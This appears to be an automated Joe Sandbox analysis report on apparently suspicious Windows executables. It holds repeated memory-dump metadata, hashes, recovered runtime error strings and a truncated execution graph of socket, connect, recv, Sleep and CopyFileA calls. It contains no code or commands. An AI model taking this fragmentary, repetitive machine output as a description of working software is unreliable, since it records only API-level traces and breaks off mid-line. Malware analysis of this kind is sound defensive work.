                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorHandleLastModule
                                                                                                                  • String ID: [E] (%s) -> GetModuleHandleExA failed(gle=%lu)$module_current
                                                                                                                  • API String ID: 4242514867-2427012484
                                                                                                                  • Opcode ID: 38d7a92dea63755e6a28399a3a56b3c40770c0a548c9f0cb618223bc2397f0ac
                                                                                                                  • Instruction ID: f12eff5e90a0886c711d9a5737e20c2ecbcec4eb474ec1faddeb6cdc978a0e34
                                                                                                                  • Opcode Fuzzy Hash: 38d7a92dea63755e6a28399a3a56b3c40770c0a548c9f0cb618223bc2397f0ac
                                                                                                                  • Instruction Fuzzy Hash: 8DF03924A1CA1280EB20BB54F8503A97760FB4E398F945132C68DC2AB6CF2CD258C750
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Byte$CharMultiWide$Lead_errno
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2766522060-0
                                                                                                                  • Opcode ID: b7e47614b01a7040d6e60f2510ffabcfe71ed503a462e64265e5097d757dc550
                                                                                                                  • Instruction ID: 07ab0c5fa1ce1159693708bf96a3d2b631db59cbb11eefd3e6da96203f43cd0c
                                                                                                                  • Opcode Fuzzy Hash: b7e47614b01a7040d6e60f2510ffabcfe71ed503a462e64265e5097d757dc550
                                                                                                                  • Instruction Fuzzy Hash: EC31AF72A0C2829AE7717F31D8403696A90EB8F788F048135EAA8C77E7DF3CD4458B00
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: signal
                                                                                                                  • String ID: CCG
                                                                                                                  • API String ID: 1946981877-1584390748
                                                                                                                  • Opcode ID: e05e11b7b03da478cb3eff391acbc219d4d7163988d74bb8d834af9c7e0f8f44
                                                                                                                  • Instruction ID: 1b5d189d259cfb5093a9c0ce4a94f4149fc6e81722195ffed29c3517aec2e9c0
                                                                                                                  • Opcode Fuzzy Hash: e05e11b7b03da478cb3eff391acbc219d4d7163988d74bb8d834af9c7e0f8f44
                                                                                                                  • Instruction Fuzzy Hash: 19218C61E0D50647FA787225C84137C2182EF4F725F2DA936C92EC6BF3DE1DA8835212
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fprintf
                                                                                                                  • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                  • API String ID: 383729395-3474627141
                                                                                                                  • Opcode ID: eb184aebe725f6c31738ef2dd5e8f3b42b676bc68a3f698a16aca6e6f7ce1523
                                                                                                                  • Instruction ID: dfd995de98e04546c8790623e07f6ad9ee528803d42ed125b7bd94e0965c094a
                                                                                                                  • Opcode Fuzzy Hash: eb184aebe725f6c31738ef2dd5e8f3b42b676bc68a3f698a16aca6e6f7ce1523
                                                                                                                  • Instruction Fuzzy Hash: F111516290CE8482D611AF1CE0413EAB370FF9E359F605726EBCC96665DF3AD1568B00
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fprintf
                                                                                                                  • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                  • API String ID: 383729395-4283191376
                                                                                                                  • Opcode ID: bfc60d37ca9a6988f5593f672af36c5057a585c8f9be36fa9b4a9f9ad44e5480
                                                                                                                  • Instruction ID: 43df85c4a2835f1ce581e64da3e47a291aec7e5476861eaeb566570fe24abf83
                                                                                                                  • Opcode Fuzzy Hash: bfc60d37ca9a6988f5593f672af36c5057a585c8f9be36fa9b4a9f9ad44e5480
                                                                                                                  • Instruction Fuzzy Hash: F4F0FB6680CF8482D211AF18E4402ABB370FF9F789F605326EBC9A6675DF3DD5428B40
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fprintf
                                                                                                                  • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                  • API String ID: 383729395-4273532761
                                                                                                                  • Opcode ID: 13a3b1830272570e6661193a87d44eff3ce7335499efeae423e896c0a233d03e
                                                                                                                  • Instruction ID: ad340481173864c95e204bc49632544c5bd1babff0e3e1df953e2eef054f6080
                                                                                                                  • Opcode Fuzzy Hash: 13a3b1830272570e6661193a87d44eff3ce7335499efeae423e896c0a233d03e
                                                                                                                  • Instruction Fuzzy Hash: 6DF0FB6680CF8482D211AF18E4402ABB370FF9E789F605326EBC9A6675DF3DD5428B40
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fprintf
                                                                                                                  • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                  • API String ID: 383729395-2187435201
                                                                                                                  • Opcode ID: a62f7440f3da8faac09ae7ec79a5f8cc0f8ffb060ae32dd71dd6362f98a5d4bc
                                                                                                                  • Instruction ID: 99a252bcde5ddfbeefd9de92bdaa06c9f7b398b8f8b4908d72409c2bef177009
                                                                                                                  • Opcode Fuzzy Hash: a62f7440f3da8faac09ae7ec79a5f8cc0f8ffb060ae32dd71dd6362f98a5d4bc
                                                                                                                  • Instruction Fuzzy Hash: 46F0FB6680CF8482D211AF18E4402ABB370FF9E789F605326EBC9A6675DF3DD5428B40
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fprintf
                                                                                                                  • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                  • API String ID: 383729395-2713391170
                                                                                                                  • Opcode ID: 0898788bb1916c83e4039a5ab0167b2e3a86215b5e3d392d65df68120d82ac9e
                                                                                                                  • Instruction ID: 64aed6f05388fe7f29cf885e411bd4c6813c5b337d08214e9c1a66d475d05302
                                                                                                                  • Opcode Fuzzy Hash: 0898788bb1916c83e4039a5ab0167b2e3a86215b5e3d392d65df68120d82ac9e
                                                                                                                  • Instruction Fuzzy Hash: A8F0FB6680CF8482D211AF18E4402ABB370FF9F789F605326EBC9A6675DF2DD5468B40
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fprintf
                                                                                                                  • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                  • API String ID: 383729395-4064033741
                                                                                                                  • Opcode ID: 61c76801d709749aa9f8a6a9a4260049e065b685215aedcdc6761c85533db195
                                                                                                                  • Instruction ID: 0037a0c1ac3afa96cd3f89a85f6860ccc6e3440d518e0431665fb4c068ab2874
                                                                                                                  • Opcode Fuzzy Hash: 61c76801d709749aa9f8a6a9a4260049e065b685215aedcdc6761c85533db195
                                                                                                                  • Instruction Fuzzy Hash: BEF0FB6680CF8482D211AF18E4402ABB370FF9F789F605326EBC9A6675DF2DD5428B40
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fprintf
                                                                                                                  • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                  • API String ID: 383729395-2468659920
                                                                                                                  • Opcode ID: 1e66a750eef62416fe29ac226196076c421e718d702112074ece5bc511332d35
                                                                                                                  • Instruction ID: dea7dd94f57f3032b42a256fc82e2febd1c8cc60ac755d0cbdc6dc10fd5e8472
                                                                                                                  • Opcode Fuzzy Hash: 1e66a750eef62416fe29ac226196076c421e718d702112074ece5bc511332d35
                                                                                                                  • Instruction Fuzzy Hash: A2F0BB66808F8482D211AF18E4002ABB375FF9E789F605326EFC966625DF29D5568B40
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.2335073990.00007FF710361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF710360000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.2335056235.00007FF710360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.2335094214.00007FF710370000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.2335094214.00007FF71096C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.2335956069.00007FF710D7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.2335993484.00007FF710D86000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.2335993484.00007FF710D88000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.2336038052.00007FF710D89000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.2336058452.00007FF710D8C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_7ff710360000_73tsjpnle0jv48sgryqfs6ph8t.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 4189dc0bd0b40e525df6bacc68198785b1c73d26038d43092f54cabf3c1e858b
                                                                                                                  • Instruction ID: acfdbfeba5e920e41a7cb29d1c3103c7b7a8557eec3918df0ef0b0d8e3a368c3
                                                                                                                  • Opcode Fuzzy Hash: 4189dc0bd0b40e525df6bacc68198785b1c73d26038d43092f54cabf3c1e858b
                                                                                                                  • Instruction Fuzzy Hash: 52B01234A04A4584E3003F05D84325C77307B05710FC24035C50C13362CF7C70484B30

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:6.4%
                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                  Signature Coverage:3.3%
                                                                                                                  Total number of Nodes:2000
                                                                                                                  Total number of Limit Nodes:28
                                                                                                                  execution_graph 57829 7ffe1a4f26da 57837 7ffe1a4f26e5 57829->57837 57830 7ffe1a4f27ee 57831 7ffe1a4f27fb 57830->57831 57888 7ffe1a4f4055 16 API calls 57830->57888 57834 7ffe1a4f270d Sleep 57834->57837 57835 7ffe1a4f4055 16 API calls 57835->57837 57837->57830 57837->57834 57837->57835 57838 7ffe1a4f27c2 Sleep 57837->57838 57840 7ffe1a4f27ae memcpy 57837->57840 57841 7ffe1a4f42ec socket 57837->57841 57876 7ffe1a4f479a 57837->57876 57887 7ffe1a4f2610 15 API calls 57837->57887 57838->57837 57840->57837 57842 7ffe1a4f44eb WSAGetLastError 57841->57842 57843 7ffe1a4f4323 57841->57843 57846 7ffe1a4f1352 12 API calls 57842->57846 57844 7ffe1a4f4327 57843->57844 57845 7ffe1a4f4345 57843->57845 57889 7ffe1a4f3f89 57844->57889 57847 7ffe1a4f3f89 14 API calls 57845->57847 57849 7ffe1a4f450f 57846->57849 57852 7ffe1a4f4343 57847->57852 57850 7ffe1a4f4519 57849->57850 57851 7ffe1a4f435f 57849->57851 57906 7ffe1a4f1352 57850->57906 57856 7ffe1a4f1352 12 API calls 57851->57856 57855 7ffe1a4f4357 57852->57855 57902 7ffe1a4f40ba setsockopt 57852->57902 57917 7ffe1a4f4055 16 API calls 57855->57917 57858 7ffe1a4f4380 57856->57858 57857 7ffe1a4f439e 57857->57855 57861 7ffe1a4f43a3 htonl htons connect 57857->57861 57858->57837 57863 7ffe1a4f43fc WSAGetLastError 57861->57863 57864 7ffe1a4f43e1 57861->57864 57865 7ffe1a4f440d 57863->57865 57866 7ffe1a4f44be WSAGetLastError 57863->57866 57867 7ffe1a4f3f89 14 API calls 57864->57867 57865->57855 57868 7ffe1a4f4415 select 57865->57868 57869 7ffe1a4f1352 12 API calls 57866->57869 57870 7ffe1a4f43ee 57867->57870 57871 7ffe1a4f4476 57868->57871 57872 7ffe1a4f44a0 57868->57872 57869->57855 57870->57849 57870->57855 57871->57864 57873 7ffe1a4f447c WSAGetLastError 57871->57873 57874 7ffe1a4f1352 12 API calls 57872->57874 57875 7ffe1a4f1352 12 API calls 57873->57875 57874->57855 57875->57855 57877 7ffe1a4f4828 57876->57877 57878 7ffe1a4f47b4 57876->57878 57879 7ffe1a4f1352 12 API calls 57877->57879 57878->57877 57880 7ffe1a4f47b9 recv 57878->57880 57881 7ffe1a4f47d3 57879->57881 57882 7ffe1a4f47dc WSAGetLastError 57880->57882 57883 7ffe1a4f47cf 57880->57883 57881->57837 57882->57881 57884 7ffe1a4f47f0 57882->57884 57883->57881 57886 7ffe1a4f1352 12 API calls 57883->57886 57885 7ffe1a4f1352 12 API calls 57884->57885 57885->57881 57886->57881 57887->57837 57888->57831 57890 7ffe1a4f3f99 ioctlsocket 57889->57890 57892 7ffe1a4f3fbc 57890->57892 57893 7ffe1a4f3fcd WSAGetLastError 57890->57893 57892->57857 57895 7ffe1a4f3ed4 setsockopt 57892->57895 57894 7ffe1a4f1352 12 API calls 57893->57894 57894->57892 57896 7ffe1a4f3f09 setsockopt 57895->57896 57897 7ffe1a4f3f64 WSAGetLastError 57895->57897 57898 7ffe1a4f3f3f WSAGetLastError 57896->57898 57901 7ffe1a4f3f35 57896->57901 57899 7ffe1a4f1352 12 API calls 57897->57899 57900 7ffe1a4f1352 12 API calls 57898->57900 57899->57901 57900->57901 57901->57852 57903 7ffe1a4f40f7 57902->57903 57904 7ffe1a4f4101 WSAGetLastError 57902->57904 57903->57857 57905 7ffe1a4f1352 12 API calls 57904->57905 57905->57903 57907 7ffe1a4f1360 57906->57907 57918 7ffe1a4fd0c0 57907->57918 57910 7ffe1a4f141c EnterCriticalSection 57912 7ffe1a4f1436 LeaveCriticalSection 57910->57912 57914 7ffe1a4f1453 57910->57914 57911 7ffe1a4f13e7 fwrite fflush 57913 7ffe1a4f1410 57911->57913 57912->57911 57913->57858 57915 7ffe1a4f148d CopyFileA 57914->57915 57916 7ffe1a4f14c5 57915->57916 57916->57912 57917->57851 57919 7ffe1a4fd0e5 57918->57919 57920 7ffe1a4fd0ce 57918->57920 57925 7ffe1a4fe120 7 API calls 57919->57925 57924 7ffe1a4fe120 7 API calls 57920->57924 57923 7ffe1a4f13b9 57923->57910 57923->57911 57923->57913 57924->57923 57925->57923 57926 7ffe1150135a 57930 7ffe11501365 57926->57930 57927 7ffe1150146e 57928 7ffe1150147b 57927->57928 57993 7ffe115057a5 14 API calls 57927->57993 57929 7ffe1150138d Sleep 57929->57930 57930->57927 57930->57929 57933 7ffe115057a5 14 API calls 57930->57933 57935 7ffe11501442 Sleep 57930->57935 57937 7ffe1150142e memcpy 57930->57937 57938 7ffe11505a3c socket 57930->57938 57973 7ffe11505eea 57930->57973 57984 7ffe11501290 57930->57984 57933->57930 57935->57930 57937->57930 57939 7ffe11505c3b WSAGetLastError 57938->57939 57940 7ffe11505a73 57938->57940 57943 7ffe115040d2 10 API calls 57939->57943 57941 7ffe11505a77 57940->57941 57942 7ffe11505a95 57940->57942 57994 7ffe115056d9 57941->57994 57946 7ffe115056d9 12 API calls 57942->57946 57945 7ffe11505c5f 57943->57945 57948 7ffe11505c69 57945->57948 57949 7ffe11505aaf 57945->57949 57950 7ffe11505a93 57946->57950 58011 7ffe115040d2 57948->58011 57954 7ffe115040d2 10 API calls 57949->57954 57953 7ffe11505aa7 57950->57953 58007 7ffe1150580a setsockopt 57950->58007 57951 7ffe11505aee 57951->57953 57956 7ffe11505af3 htonl htons connect 57951->57956 58022 7ffe115057a5 14 API calls 57953->58022 57958 7ffe11505ad0 57954->57958 57960 7ffe11505b4c WSAGetLastError 57956->57960 57961 7ffe11505b31 57956->57961 57958->57930 57963 7ffe11505b5d 57960->57963 57964 7ffe11505c0e WSAGetLastError 57960->57964 57962 7ffe115056d9 12 API calls 57961->57962 57966 7ffe11505b3e 57962->57966 57963->57953 57967 7ffe11505b65 select 57963->57967 57965 7ffe115040d2 10 API calls 57964->57965 57965->57953 57966->57945 57966->57953 57968 7ffe11505bc6 57967->57968 57969 7ffe11505bf0 57967->57969 57968->57961 57971 7ffe11505bcc WSAGetLastError 57968->57971 57970 7ffe115040d2 10 API calls 57969->57970 57970->57953 57972 7ffe115040d2 10 API calls 57971->57972 57972->57953 57974 7ffe11505f78 57973->57974 57975 7ffe11505f04 57973->57975 57976 7ffe115040d2 10 API calls 57974->57976 57975->57974 57977 7ffe11505f09 recv 57975->57977 57978 7ffe11505f23 57976->57978 57979 7ffe11505f2c WSAGetLastError 57977->57979 57980 7ffe11505f1f 57977->57980 57978->57930 57979->57978 57981 7ffe11505f40 57979->57981 57980->57978 57983 7ffe115040d2 10 API calls 57980->57983 57982 7ffe115040d2 10 API calls 57981->57982 57982->57978 57983->57978 57985 7ffe115012a8 57984->57985 57986 7ffe11501352 57984->57986 57985->57986 58031 7ffe11509395 57985->58031 57986->57930 57989 7ffe11501344 LeaveCriticalSection 57989->57986 57990 7ffe115012d8 57990->57989 57991 7ffe115040d2 10 API calls 57990->57991 58034 7ffe1150e1cc 57990->58034 57991->57990 57993->57928 57995 7ffe115056e9 ioctlsocket 57994->57995 57997 7ffe1150571d WSAGetLastError 57995->57997 57998 7ffe1150570c 57995->57998 57999 7ffe115040d2 10 API calls 57997->57999 57998->57951 58000 7ffe11505624 setsockopt 57998->58000 57999->57998 58001 7ffe11505659 setsockopt 58000->58001 58002 7ffe115056b4 WSAGetLastError 58000->58002 58003 7ffe1150568f WSAGetLastError 58001->58003 58006 7ffe11505685 58001->58006 58004 7ffe115040d2 10 API calls 58002->58004 58005 7ffe115040d2 10 API calls 58003->58005 58004->58006 58005->58006 58006->57950 58008 7ffe11505847 58007->58008 58009 7ffe11505851 WSAGetLastError 58007->58009 58008->57951 58010 7ffe115040d2 10 API calls 58009->58010 58010->58008 58012 7ffe115040e0 58011->58012 58023 7ffe1150eea0 58012->58023 58015 7ffe1150419c EnterCriticalSection 58017 7ffe115041b6 LeaveCriticalSection 58015->58017 58019 7ffe115041d3 58015->58019 58016 7ffe11504167 fwrite fflush 58018 7ffe11504190 58016->58018 58017->58016 58018->57958 58020 7ffe1150420d CopyFileA 58019->58020 58021 7ffe11504245 58020->58021 58021->58017 58022->57949 58024 7ffe1150eeae 58023->58024 58025 7ffe1150eec5 58023->58025 58029 7ffe1150ff00 fputc WideCharToMultiByte _errno ___mb_cur_max_func ___lc_codepage_func 58024->58029 58030 7ffe1150ff00 fputc WideCharToMultiByte _errno ___mb_cur_max_func ___lc_codepage_func 58025->58030 58028 7ffe11504139 58028->58015 58028->58016 58028->58018 58029->58028 58030->58028 58032 7ffe115012bb EnterCriticalSection 58031->58032 58033 7ffe115093ab GetSystemTimeAsFileTime 58031->58033 58032->57990 58033->58032 58035 7ffe1150e246 58034->58035 58036 7ffe1150e1fc 58034->58036 58035->57990 58037 7ffe1150e351 58036->58037 58038 7ffe1150e20a 58036->58038 58086 7ffe1150dad2 74 API calls 58037->58086 58039 7ffe1150e2be 58038->58039 58040 7ffe1150e210 58038->58040 58042 7ffe1150e2c5 58039->58042 58043 7ffe1150e306 58039->58043 58044 7ffe1150e35f 58040->58044 58045 7ffe1150e21b 58040->58045 58042->58035 58083 7ffe1150d748 61 API calls 58042->58083 58049 7ffe1150e34a 58043->58049 58050 7ffe1150e30d 58043->58050 58088 7ffe1150df3e 60 API calls 58044->58088 58047 7ffe1150e270 58045->58047 58048 